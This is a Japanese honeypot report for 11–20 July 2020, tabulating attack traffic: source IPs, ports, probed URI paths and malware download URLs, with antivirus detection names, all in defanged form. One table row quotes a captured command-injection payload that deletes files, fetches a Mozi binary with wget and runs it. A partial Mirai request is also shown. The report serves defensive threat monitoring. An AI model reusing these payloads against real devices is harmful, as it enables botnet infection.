2020/7/11-7/20 のハニーポットの簡易分析となります。

Honeytrap(Total)

Number of detections

Date	Detections
20200711	10199
20200712	10806
20200713	142645
20200714	20625
20200715	17479
20200716	17890
20200717	30806
20200718	10413
20200719	35053
20200720	17726

RemoteIP(TOP20)

IP	Country	Count	AbuseIPDB
193[.]106[.]31[.]106	Ukraine	131712 件	Link
45[.]141[.]87[.]2	Russia	30745 件	Link
185[.]202[.]1[.]188	France	16894 件	Link
45[.]141[.]86[.]142	Russia	13119 件	Link
192[.]35[.]169[.]48	United States	7836 件	Link
194[.]61[.]54[.]237	Russia	6568 件	Link
218[.]92[.]0[.]208	China	6365 件	Link
91[.]241[.]19[.]174	Russia	6341 件	Link
213[.]108[.]134[.]156	Russia	5215 件	Link
185[.]202[.]2[.]32	France	2719 件	Link
185[.]202[.]1[.]82	France	2506 件	Link
185[.]202[.]2[.]21	France	2458 件	Link
91[.]241[.]19[.]173	Russia	1999 件	Link
79[.]124[.]8[.]77	United Kingdom	1888 件	Link
209[.]97[.]171[.]184	Singapore	1673 件	Link
5[.]188[.]206[.]50	United States	1454 件	Link
49[.]88[.]112[.]70	China	1023 件	Link
193[.]142[.]146[.]19	Netherlands	1009 件	Link
167[.]99[.]164[.]22	United States	938 件	Link
218[.]92[.]0[.]211	China	852 件	Link

Port(TOP20)

Port	Service	Count
22	The Secure Shell (SSH) Protocol	17335 件
445	Microsoft-DS	16998 件
1433	Microsoft-SQL-Server	12738 件
3389	MS WBT Server	4343 件
8088	Radan HTTP	1362 件
81	Unknown	1032 件
502	Modbus Application Protocol	790 件
8080	HTTP Alternate (see port 80)	376 件
5432	PostgreSQL Database	376 件
88	Kerberos	261 件
5555	Android Debug Bridge	239 件
8081	Sun Proxy Admin Service	212 件
139	NETBIOS Session Service	181 件
8443	PCsync HTTPS	180 件
21	File Transfer Protocol [Control]	167 件
85	MIT ML Device	162 件
37215	Unknown	158 件
6379	An advanced key-value cache and store	155 件
8089	Unknown	144 件
9200	WAP connectionless session service	139 件

URI PATH

/streaming/clients_live[.]php
脆弱性の種類は特定できていませんが、/streaming/clients_live[.]php 宛への通信は複数ポートで確認できました。

URI Path	Target	CVE	Count
No uri path	-	-	302276 件
/	-	-	7255 件
/ws/v1/cluster/apps/new-application	Apache Hadoop	-	1263 件
login[.]cgi	D-Link Router	-	248 件
/streaming/clients_live[.]php	-	-	170 件
/ftptest[.]cgi	Web Camera	-	162 件
/set_ftp[.]cgi	-	-	159 件
hxxp://163[.]172[.]88[.]110:41298/pass	Unauthorized relay	-	144 件
/ctrlt/DeviceUpgrade_1	Huawei Home Device	-	141 件
sip:nm	Session Initiation Protocol	-	103 件
/nice	-	-	99 件
/stalker_portal/c/	-	-	86 件
/stalker_portal/c/version[.]js	-	-	85 件
/client_area/	Unknown	Unknown	85 件
/system_api[.]php	-	-	85 件
/api[.]php	api	-	85 件
/login[.]php	Login Page	-	85 件
/streaming	-	-	85 件
/streaming/er678pkf[.]php	-	-	85 件
/picsdesc[.]xml	Realtek SDK	CVE-2014-8361	61 件
hxxp://clientapi[.]ipip[.]net/echo[.]php	Unauthorized relay	-	57 件
/admin/assets/js/views/login[.]js	FreePBX	-	56 件
/manager/html	Apache Tomcat Manager	-	45 件
/version	-	-	44 件
/shell	-	-	42 件
hxxp://example[.]com/	Unauthorized relay	-	36 件
/service/extdirect	-	-	32 件
hxxp://112[.]35[.]66[.]7:8088/index[.]ph p	-	-	32 件
/jars	Unknown	-	31 件
/jmx	JMX	-	29 件
/ipp	CUPS	CVE-2015-1158	26 件
/_ping	Unknown	-	24 件
hxxp://112[.]35[.]63[.]31:8088/index[.]p hp	-	-	22 件
/v1[.]16/version	-	-	21 件
hxxp://112[.]124[.]42[.]80:63435/	Unauthorized relay	-	20 件
/setup/index[.]jsp	-	-	17 件
/solr/admin/info/system	-	-	14 件
hxxp://112[.]35[.]88[.]28:8088/index[.]p hp	-	-	14 件
/api/v1/targets	api	-	12 件
/api/v1/label/version/values	api	-	12 件
hxxp://pv[.]sohu[.]com/cityjson	Unauthorized relay	-	12 件
hxxp://112[.]35[.]53[.]83:8088/index[.]p hp	-	-	12 件
/_search	Elasticsearch	-	11 件
/\cgi-bin/get_status[.]cgi	Apexis IP CAM	-	11 件
/config/getuser	-	-	10 件
/\cgi-bin/login[.]cgi	Crestron AirMedia AM-100	CVE-2016-5639	10 件
hxxp://123[.]125[.]114[.]144/	Unauthorized relay	-	10 件
/containers/json	Docker	-	10 件
/hudson	Unknown	-	9 件
/tmUnblock[.]cgi	-	-	9 件
/info	-	-	9 件
/stats	-	-	9 件
/db/manage/	Database	-	9 件
/api/v1/label/goversion/values	api	-	8 件
/api/v1/query	api	-	8 件
/wls-wsat/CoordinatorPortType11	Weblogic	CVE-2017-10271	7 件
/v1[.]40/containers/json	Docker	-	7 件
/lib/flagrate/flagrate[.]min[.]css	Flagrate	-	6 件
/images/json	Docker	-	6 件
/setup/eureka_info	-	-	6 件
rtsp://160[.]16[.]145[.]183:554/12	RTSP	-	5 件
/admin-scripts[.]asp	Administrator	-	5 件
/phpMyAdmin-3[.]0[.]0[.]0-all-languages/ scripts/setup[.]php	phpMyAdmin	-	5 件
/tmpfs/auto[.]jpg	-	-	4 件
/UD/	Eir D1000 Wireless Router	-	4 件
/manager/text/list	Apache Tomcat Manager	-	4 件
/wsman	WinRM	-	4 件
/status	-	-	3 件
/cgi-bin/supervisor/CloudSetup[.]cgi	CGI	-	3 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd	-	-	3 件
/_config	Unknown	Unknown	3 件
hxxps://hxxpbin[.]org/ip	Unauthorized Relay	-	3 件
RTSP://160[.]16[.]145[.]183:554/	RTSP	-	2 件
RTSP://160[.]16[.]145[.]183:8554/	RTSP	-	2 件
/json_rpc	JSON-RPC	-	2 件
/admin/login[.]asp	Administrator	-	2 件
rtsp://	RTSP	-	2 件
/upnpdev[.]xml	Huawei Home Gateway(HG655m)	-	2 件
/tr064dev[.]xml	-	-	2 件
/solr/	-	-	2 件
/TP/public/index[.]php	-	-	2 件
/UD/act	Eir D1000 Wireless Router	-	2 件
/_cat/indices	Elasticsearch	-	2 件
/cgi-bin/bfenterprise/clientregister[.]e xe	CGI	-	2 件
/ws/v1/cluster	Apache Hadoop	-	2 件
/cgi-bin/nobody/Search[.]cgi	CGI	-	2 件
/master-status	Unknown	-	2 件
/boaform/admin/formLogin	Administrator	-	2 件
/install[.]php	php	-	2 件
/upnp/control/WANIPConn1	UPnP	-	2 件
/0bef	Unknown	-	1 件
hxxp://160[.]16[.]145[.]183:49152/upnp/c ontrol/basicevent1	Unauthorized relay	-	1 件
/admin/connection/	Administrator	-	1 件
/server-info	-	-	1 件
/HNAP1/	D-Link Router	CVE-2017-3193	1 件
/wls-wsat/CoordinatorPortType	Weblogic	CVE-2017-10271	1 件
/cgi	CGI	-	1 件
/fikker/webcache[.]fik	Fikker	-	1 件
/_nodes	Unknown	Unknown	1 件
rtsp://160[.]16[.]145[.]183:21553/12	RTSP	-	1 件
rtsp://160[.]16[.]145[.]183:44554/12	RTSP	-	1 件
/check	Unknown	Unknown	1 件
hxxp://www[.]overflow[.]biz/ip_json[.]ph p	Unauthorized relay	-	1 件
/wp-login[.]php	WordPress	-	1 件
RTSP://160[.]16[.]145[.]183:10554/	RTSP	-	1 件
/nwa	Unknown	Unknown	1 件
/script	-	-	1 件
/language/Swedish${IFS}&&cd${IFS}/tmp;rm ${IFS}-rf${IFS}*;wget${IFS}hxxp://192[.] 168[.]1[.]1:8088/Mozi[.]a;sh${IFS}/tmp/M ozi[.]a&>r&&tar${IFS}/string[.]js	Multiple CCTV-DVR Vendors	-	1 件
/versions	-	-	1 件
/favicon[.]ico	favicon	-	1 件
/cluser	Unknown	Unknown	1 件
/api/v1	api	-	1 件
/setup[.]xml	-	-	1 件
/v2/stats/self	-	-	1 件
/A6nw	Unknown	Unknown	1 件
/live/CPEManager/AXCampaignManager/delet e_cpes_by_ids	Zyxel CNM SecuManager	-	1 件
/setup[.]cgi	-	-	1 件
/jsproxy	MikroTik RouterOS	-	1 件
hxxps://api[.]ipify[.]org/	Unauthorized Relay	-	1 件
/login	Login Page	-	1 件
/CTCWebService/CTCWebServiceBean	SAP	CVE-2020-6286 CVE-2020-6287	1 件
/invoker/EJBInvokerServlet	HP Product	CVE-2013-4810	1 件
/api	api	-	1 件

Malware

hxxp://37[.]49[.]230[.]201/ScyllaBinsLMaOGuESsWhatYerNotGettIn3m/Scylla[.]mips
Eir D1000 ルータの脆弱性を狙った攻撃でMiraiをダウンロードを試みている通信でした。
User-Agentが特徴的なので特定のMiraiの種類かもしれません。
<ペイロード>
POST /UD/act?1 HTTP/1.1
User-Agent: Masayki

VT リンク

First Ditection	MalwareURL	Count	VirusTotal	SHA1
2020-03-14	hxxp://d[.]powerofwish[.]com/pm[.]sh	33	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-07-17	hxxp://45[.]95[.]168[.]248/1/c[.]sh	12	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-07-14	hxxp://ev0lve[.]cf/arm	7	Avast:ELF:Svirtu-AA [Trj], Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b, Tencent:Backdoor[.]Linux[.]Mirai[.]waq, Fortinet:ELF/Mirai[.]A!tr, ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b, Avast-Mobile:ELF:Svirtu-AA [Trj], Ikarus:Trojan[.]Linux[.]Mirai, AVG:ELF:Svirtu-AA [Trj]	9ca04ed2689561449b7e93cc375ec458a2a7891b
2020-07-14	hxxp://185[.]172[.]110[.]178/8UsA[.]sh	5	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-07-14	hxxp://185[.]172[.]110[.]250/infect	5	NG	No Hash
2020-07-08	hxxp://95[.]213[.]165[.]45/beastmode	4	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-07-13	hxxp://94[.]232[.]252[.]38/infect	4	NG	No Hash
2020-07-13	45[.]95[.]168[.]143/beastmode/b3astmode[.]arm7	4	NG	No Hash
2020-03-15	hxxp://185[.]62[.]189[.]18/jaws[.]sh	4	NG	No Hash
2020-07-14	hxxp://45[.]95[.]168[.]230/YesK4Pz9CJ7dQ0EUhkwc3tXSWoR5rB/Meth[.]mips	3	FireEye:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]8, Symantec:Linux[.]Mirai, ESET-NOD32:a variant of Linux/Mirai[.]L, ClamAV:Unix[.]Dropper[.]Mirai-7135870-0, Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b, BitDefender:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]8, Rising:Backdoor[.]Mirai/Linux!1[.]BAF6 (CLASSIC), Emsisoft:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]8 (B), DrWeb:Linux[.]Mirai[.]2058, Sophos:Linux/DDoS-DD, Ikarus:Trojan[.]Linux[.]Gafgyt, Arcabit:Trojan[.]Trojan[.]Linux[.]Gafgyt[.]8, ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b, MAX:malware (ai score=89), Tencent:Backdoor[.]Linux[.]Mirai[.]wao, GData:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]8	e49bf19e578d5eda1b15079ec9ae44d177692ab4
2020-07-09	hxxp://94[.]102[.]54[.]78/bins/mpsl	2	NG	No Hash
2020-07-10	hxxp://165[.]227[.]54[.]195/666[.]sh	2	NG	No Hash
2020-07-13	hxxp://23[.]254[.]217[.]64/ttee[.]sh	2	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-07-14	hxxp://45[.]95[.]168[.]190/infect	2	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-07-15	hxxp://67[.]205[.]173[.]140/666[.]sh	2	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-06-26	hxxp://5[.]206[.]227[.]228/curl	2	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-07-16	hxxp://5[.]206[.]227[.]228/jaw	2	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-07-18	hxxp://91[.]189[.]187[.]163/s[.]sh	2	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-07-18	hxxp://45[.]143[.]223[.]42/GhOul[.]sh	2	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-07-10	hxxp://45[.]88[.]3[.]145/bins/mpsl	1	DrWeb:Linux[.]Mirai[.]53, ClamAV:Unix[.]Dropper[.]Mirai-7136015-0, FireEye:Trojan[.]Linux[.]Mirai[.]1, McAfee:GenericRXJE-XQ!8EDCFBF9C4EF, BitDefenderTheta:Gen:NN[.]Mirai[.]34132, TrendMicro-HouseCall:Backdoor[.]Linux[.]MIRAI[.]VWIUL, Avast:ELF:Mirai-AAJ [Trj], Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b, BitDefender:Trojan[.]Linux[.]Mirai[.]1, MicroWorld-eScan:Trojan[.]Linux[.]Mirai[.]1, Rising:Backdoor[.]Mirai!8[.]E05B (TFE:14:axYsWbEAOXT), Ad-Aware:Trojan[.]Linux[.]Mirai[.]1, TrendMicro:Backdoor[.]Linux[.]MIRAI[.]VWIUL, Emsisoft:Trojan[.]Linux[.]Mirai[.]1 (B), Cyren:ELF/Mirai[.]G[.]gen!Camelot, Jiangmin:Backdoor[.]Linux[.]dzex, Fortinet:ELF/Gafgyt[.]KR!tr, Antiy-AVL:Trojan[Backdoor]/Linux[.]Mirai[.]b, Arcabit:Trojan[.]Linux[.]Mirai[.]1, ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b, Avast-Mobile:ELF:Mirai-ANO [Trj], AhnLab-V3:Linux/Mirai[.]Gen13, ALYac:Trojan[.]Linux[.]Mirai[.]1, MAX:malware (ai score=84), ESET-NOD32:a variant of Linux/Mirai[.]L, Tencent:Backdoor[.]Linux[.]Mirai[.]wav, Ikarus:Trojan[.]Linux[.]Mirai, GData:Linux[.]Trojan[.]Mirai[.]G, AVG:ELF:Mirai-AAJ [Trj]	ecf91aa86bafb3f64d97c6f696637e80f436f1e3
2020-07-10	hxxp://95[.]213[.]165[.]45/beastmode/b3astmode[.]mips	1	NG	No Hash
2020-04-10	hxxp://176[.]123[.]3[.]96/arm7	1	NG	No Hash
2020-07-11	hxxp://199[.]195[.]249[.]22/Jaws[.]sh	1	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-07-11	hxxp://37[.]49[.]230[.]201/ScyllaBinsLMaOGuESsWhatYerNotGettIn3m/Scylla[.]mips	1	ClamAV:Unix[.]Trojan[.]Gafgyt-6748839-0, FireEye:Trojan[.]Linux[.]Mirai[.]1, McAfee:Linux/Mirai-FDXO!3D7446FAA94C, Sangfor:Malware, BitDefenderTheta:Gen:NN[.]Mirai[.]34132, ESET-NOD32:a variant of Linux/Mirai[.]BC, TrendMicro-HouseCall:Trojan[.]Linux[.]MIRAI[.]SMMR1, Avast:ELF:Hajime-R [Trj], Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]ad, BitDefender:Trojan[.]Linux[.]Mirai[.]1, MicroWorld-eScan:Trojan[.]Linux[.]Mirai[.]1, Tencent:Backdoor[.]Linux[.]Mirai[.]wao, Ad-Aware:Trojan[.]Linux[.]Mirai[.]1, TrendMicro:Trojan[.]Linux[.]MIRAI[.]SMMR1, Emsisoft:Trojan[.]Linux[.]Mirai[.]1 (B), Cyren:ELF/Mirai[.]D[.]gen!Camelot, Fortinet:ELF/Mirai[.]AE!tr, Arcabit:Trojan[.]Linux[.]Mirai[.]1, ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]ad, Avast-Mobile:ELF:Mirai-UF [Trj], Microsoft:DDoS:Linux/Gafgyt[.]YA!MTB, AhnLab-V3:Linux/Mirai[.]Gen3, ALYac:Trojan[.]Linux[.]Mirai[.]1, MAX:malware (ai score=82), Rising:Backdoor[.]Mirai/Linux!1[.]BAF6 (CLASSIC), Ikarus:Trojan[.]Linux[.]Mirai, GData:Linux[.]Trojan[.]Mirai[.]J, AVG:ELF:Hajime-R [Trj]	b70222bb25d4b2cd797786c2a6fdeba29be0d9b1
2020-07-11	hxxp://37[.]49[.]230[.]201/ScyllaBinsLMaOGuESsWhatYerNotGettIn3m/Scylla[.]x86	1	MicroWorld-eScan:Trojan[.]Linux[.]Mirai[.]1, ClamAV:Unix[.]Trojan[.]Gafgyt-6748839-0, FireEye:Trojan[.]Linux[.]Mirai[.]1, ALYac:Trojan[.]Linux[.]Mirai[.]1, Sangfor:Malware, Symantec:Trojan[.]Gen[.]NPE, TrendMicro-HouseCall:Trojan[.]Linux[.]MIRAI[.]SMMR1, Avast:ELF:Hajime-R [Trj], Cynet:Malicious (score: 85), Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]ad, BitDefender:Trojan[.]Linux[.]Mirai[.]1, Rising:Backdoor[.]Mirai/Linux!1[.]BAF6 (CLASSIC), Ad-Aware:Trojan[.]Linux[.]Mirai[.]1, Emsisoft:Trojan[.]Linux[.]Mirai[.]1 (B), F-Secure:Malware[.]LINUX/Mirai[.]jwskl, TrendMicro:Trojan[.]Linux[.]MIRAI[.]SMMR1, Sophos:Mal/Generic-S, SentinelOne:DFI - Malicious ELF, Cyren:ELF/Mirai[.]D[.]gen!Camelot, Avira:LINUX/Mirai[.]jwskl, Fortinet:ELF/Mirai[.]AT!tr, Arcabit:Trojan[.]Linux[.]Mirai[.]1, ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]ad, Avast-Mobile:ELF:Mirai-UF [Trj], Microsoft:DDoS:Linux/Gafgyt[.]YA!MTB, AhnLab-V3:Linux/Mirai[.]Gen3, McAfee:Linux/Mirai-FDXO!9590D1AD3D40, MAX:malware (ai score=87), ESET-NOD32:a variant of Linux/Mirai[.]AX, Tencent:Backdoor[.]Linux[.]Mirai[.]wan, Ikarus:Trojan[.]Linux[.]Mirai, GData:Linux[.]Trojan[.]Mirai[.]J, BitDefenderTheta:Gen:NN[.]Mirai[.]34132, AVG:ELF:Hajime-R [Trj]	933d27a06a8b97aebec3fce02e764700de13a488
2020-05-18	hxxp://YOURIPHERE/bins/mpsl	1	NG	No Hash
2020-07-14	hxxp://45[.]95[.]168[.]230/sn0rt[.]sh	1	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-04-17	hxxp://205[.]185[.]115[.]72/b	1	NG	No Hash
2020-07-15	hxxp://164[.]90[.]154[.]158/reaper/reap[.]mpsl	1	NG	No Hash
2020-04-17	hxxp://192[.]168[.]1[.]1:8088/Mozi[.]a	1	NG	No Hash
2020-07-17	95[.]213[.]165[.]43/bins/UnHAnaAW[.]arm7	1	NG	No Hash
2020-04-20	hxxp://178[.]33[.]64[.]107/arm7	1	NG	No Hash
2020-07-18	hxxp://185[.]172[.]111[.]182/8UsA[.]sh	1	No Data	da39a3ee5e6b4b0d3255bfef95601890afd80709

WOWHoneypot(Total)

Number of detections

Date	Detections
20200711	55
20200712	251
20200713	411
20200714	741
20200715	135
20200716	86
20200717	365
20200718	2062
20200719	70
20200720	106

RemoteIP(TOP20)

IP	Country	Count	AbuseIPDB
31[.]193[.]21[.]39	Italy	2001 件	Link
185[.]128[.]41[.]50	Switzerland	514 件	Link
185[.]216[.]140[.]239	Netherlands	172 件	Link
195[.]54[.]160[.]21	Russia	44 件	Link
107[.]167[.]7[.]226	United States	42 件	Link
103[.]75[.]189[.]81	Malaysia	20 件	Link
195[.]54[.]160[.]135	Russia	19 件	Link
143[.]92[.]32[.]86	Cambodia	16 件	Link
80[.]82[.]70[.]140	Seychelles	12 件	Link
143[.]92[.]32[.]106	Cambodia	12 件	Link
35[.]200[.]47[.]165	Unknown	12 件	Link
93[.]174[.]93[.]139	Netherlands	11 件	Link
167[.]99[.]164[.]22	United States	11 件	Link
45[.]199[.]113[.]16	United States	10 件	Link
185[.]100[.]87[.]248	Romania	10 件	Link
65[.]74[.]177[.]84	United States	9 件	Link
93[.]113[.]111[.]100	United Kingdom	9 件	Link
62[.]210[.]185[.]4	France	9 件	Link
46[.]101[.]31[.]59	United Kingdom	9 件	Link
104[.]199[.]101[.]230	United States	9 件	Link

URI PATH

URI Path	Target	CVE	Count
/manager/html	Apache Tomcat Manager	-	2516 件
/wp-login[.]php	WordPress	-	588 件
/	-	-	420 件
/xmlrpc[.]php	Wordpress	-	294 件
github[.]com:443	Unauthorized Relay	-	30 件
/phpMyAdmin/scripts/setup[.]php	phpMyAdmin	-	24 件
hxxpbin[.]org:443	Unauthorized Relay	-	14 件
/solr/admin/info/system	-	-	11 件
/index[.]php	-	-	11 件
/vendor/phpunit/phpunit/src/Util/PHP/eva l-stdin[.]php	PHPUnit	CVE-2017-9841	10 件
/hudson	Unknown	-	9 件
/api/jsonws/invoke	api	-	9 件
/cgi-bin/mainfunction[.]cgi	CGI	-	8 件
/[.]env	Hidden files	-	8 件
/portal/redlion	Unknown	Unknown	8 件
/config/getuser	-	-	8 件
sm[.]bdimg[.]com:443	Unauthorized Relay	-	7 件
/boaform/admin/formLogin	Administrator	-	6 件
g[.]alicdn[.]com:443	Unauthorized Relay	-	6 件
/favicon[.]ico	favicon	-	5 件
/admin/login[.]asp	Administrator	-	3 件
/webfig/	MikroTik RouterOS	-	3 件
/phpmyadmin/	phpMyAdmin	-	3 件
/myadmin/scripts/setup[.]php	Administrator	-	3 件
/phpmy/scripts/setup[.]php	phpMyAdmin	-	3 件
/pma/scripts/setup[.]php	phpMyAdmin	-	3 件
/shell	-	-	3 件
/robots[.]txt	robots.txt	-	3 件
/cgi-bin/kerbynet	CGI	-	3 件
/ipc$	shared folder	-	2 件
/database/scripts/setup[.]php	Database	-	2 件
/db/scripts/setup[.]php	Database	-	2 件
/dbadmin/scripts/setup[.]php	Administrator	-	2 件
/my/scripts/setup[.]php	PHPMyAdmin	-	2 件
/mysql/scripts/setup[.]php	MySQL	-	2 件
/mysqladmin/scripts/setup[.]php	MySQL	-	2 件
/phpMyAdmin-2/scripts/setup[.]php	phpMyAdmin	-	2 件
/phpadmin/scripts/setup[.]php	Administrator	-	2 件
/phpmyadmin/scripts/setup[.]php	phpMyAdmin	-	2 件
/phpmyadmin1/scripts/setup[.]php	phpMyAdmin	-	2 件
/phpmyadmin2/scripts/setup[.]php	phpMyAdmin	-	2 件
/scripts/setup[.]php	-	-	2 件
/sqladm/scripts/setup[.]php	-	-	2 件
/sqladmin/scripts/setup[.]php	-	-	2 件
/MyAdmin/scripts/setup[.]php	Administrator	-	2 件
hxxp://example[.]com/	Unauthorized relay	-	2 件
/streaming/clients_live[.]php	-	-	2 件
/sdk	-	-	2 件
/[.]remote	Hidden files	-	2 件
/[.]local	Hidden files	-	2 件
/[.]production	Hidden files	-	2 件
//vendor/[.]env	-	-	2 件
//lib/[.]env	-	-	2 件
//lab/[.]env	-	-	2 件
//cronlab/[.]env	-	-	2 件
//cron/[.]env	-	-	2 件
//core/[.]env	-	-	2 件
//core/app/[.]env	-	-	2 件
//core/Datavase/[.]env	-	-	2 件
//database/[.]env	-	-	2 件
//config/[.]env	-	-	2 件
//assets/[.]env	-	-	2 件
//app/[.]env	-	-	2 件
//apps/[.]env	-	-	2 件
//uploads/[.]env	-	-	2 件
//sitemaps/[.]env	-	-	2 件
//saas/[.]env	-	-	2 件
/wp-content/plugins/t_file_wp/t_file_wp[ .]php	WordPress	-	2 件
/wordpress/wp-login[.]php	WordPress	-	2 件
5[.]132[.]162[.]27:443	Unauthorized Relay	-	2 件
hxxp://163[.]172[.]88[.]110:41298/pass	Unauthorized relay	-	2 件
/sitemap[.]xml	-	-	2 件
/[.]well-known/security[.]txt	Hidden files	-	2 件
/boaform/admin/formPing	Administrator	-	1 件
ext[.]baidu[.]com:443	Unauthorized Relay	-	1 件
hxxp://112[.]124[.]42[.]80:63435/	Unauthorized relay	-	1 件
/w00tw00t[.]at[.]blackhats[.]romanian[.] anti-sec:)	ZmEu	-	1 件
/2phpmyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA2011/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA2012/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA2013/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA2015/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA2016/scripts/setup[.]php	phpMyAdmin	-	1 件
/PMA2018/scripts/setup[.]php	phpMyAdmin	-	1 件
/SQL/scripts/setup[.]php	-	-	1 件
/_PHPMYADMIN/scripts/setup[.]php	phpMyAdmin	-	1 件
/admin/db/scripts/setup[.]php	Administrator	-	1 件
/admin/mysql/scripts/setup[.]php	MySQL	-	1 件
/admin/pMA/scripts/setup[.]php	phpMyAdmin	-	1 件
/admin/phpMyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/admin/scripts/setup[.]php	Administrator	-	1 件
/admin/setup[.]php	Administrator	-	1 件
/admin/sql/scripts/setup[.]php	SQL	-	1 件
/admin/sqladmin/scripts/setup[.]php	SQLAdmin	-	1 件
/admin/sysadmin/scripts/setup[.]php	Administrator	-	1 件
/admin/web/scripts/setup[.]php	Administrator	-	1 件
/administrator1/admin/scripts/setup[.]ph p	Administrator	-	1 件
/administrator1/db/scripts/setup[.]php	Administrator	-	1 件
/administrator1/pma/scripts/setup[.]php	phpMyAdmin	-	1 件
/administrator1/web/scripts/setup[.]php	Administrator	-	1 件
/administrator/admin/scripts/setup[.]php	Administrator	-	1 件
/administrator/db/scripts/setup[.]php	Administrator	-	1 件
/administrator/pma/scripts/setup[.]php	phpMyAdmin	-	1 件
/administrator/web/scripts/setup[.]php	Administrator	-	1 件
/blog/phpmyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/cpadmin/scripts/setup[.]php	Administrator	-	1 件
/cpadmindb/scripts/setup[.]php	Administrator	-	1 件
/cpanelmysql/scripts/setup[.]php	MySQL	-	1 件
/cpanelphpmyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/db/db-admin/scripts/setup[.]php	Administrator	-	1 件
/db/dbadmin/scripts/setup[.]php	Administrator	-	1 件
/db/dbweb/scripts/setup[.]php	Database	-	1 件
/db/myadmin/scripts/setup[.]php	Administrator	-	1 件
/db/phpMyAdmin-3/scripts/setup[.]php	phpMyAdmin	-	1 件
/db/phpmyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/db/phpmyadmin3/scripts/setup[.]php	phpMyAdmin	-	1 件
/db/webadmin/scripts/setup[.]php	Administrator	-	1 件
/db/webdb/scripts/setup[.]php	Database	-	1 件
/db/websql/scripts/setup[.]php	SQL	-	1 件
/mysql-admin/scripts/setup[.]php	MySQL	-	1 件
/mysql/admin/scripts/setup[.]php	MySQL	-	1 件
/mysql/db/scripts/setup[.]php	MySQL	-	1 件
/mysql/mysqlmanager/scripts/setup[.]php	MySQL	-	1 件
/mysql/pMA/scripts/setup[.]php	phpMyAdmin	-	1 件
/mysql/sqlmanager/scripts/setup[.]php	MySQL	-	1 件
/mysql/web/scripts/setup[.]php	MySQL	-	1 件
/mysqlmanager/scripts/setup[.]php	MySQL	-	1 件
/p/m/a/scripts/setup[.]php	phpMyAdmin	-	1 件
/php-my-admin/scripts/setup[.]php	phpMyAdmin	-	1 件
/php-myadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/php/phpmyadmin/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpLDAPadmin/scripts/setup[.]php	Administrator	-	1 件
/phpMyAdmi/scripts/setup[.]php	phpMyAdmin	-	1 件
/hpMyAdmin/scripts/setup[.]php	Administrator	-	1 件
/phpMyAdmin-2009-1/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpMyAdmin-2009-3/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpMyAdmin-2009-2/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpMyAdmin-3[.]1[.]3[.]1/scripts/setup[ .]php	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]11[.]9[.]5/scripts/setup [.]php	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]10[.]0[.]0/scripts/setup [.]php	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]10[.]0/scripts/setup[.]p hp	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]11[.]1-all-languages/scr ipts/setup[.]php	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]11[.]11[.]3/scripts/setu p[.]php	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]11[.]11/scripts/setup[.] php	phpMyAdmin	-	1 件
/phpMyAdmin-2[.]5[.]5/scripts/setup[.]ph p	phpMyAdmin	-	1 件
/phpMyAdmin-3[.]0[.]0[.]0-all-languages/ scripts/setup[.]php	phpMyAdmin	-	1 件
/phpMyAdmin-3/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpMyAds/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmanager/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmy-admin/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2011/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2012/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2013/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2014/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2015/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2017/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin2018/scripts/setup[.]php	phpMyAdmin	-	1 件
/phpmyadmin3/scripts/setup[.]php	phpMyAdmin	-	1 件
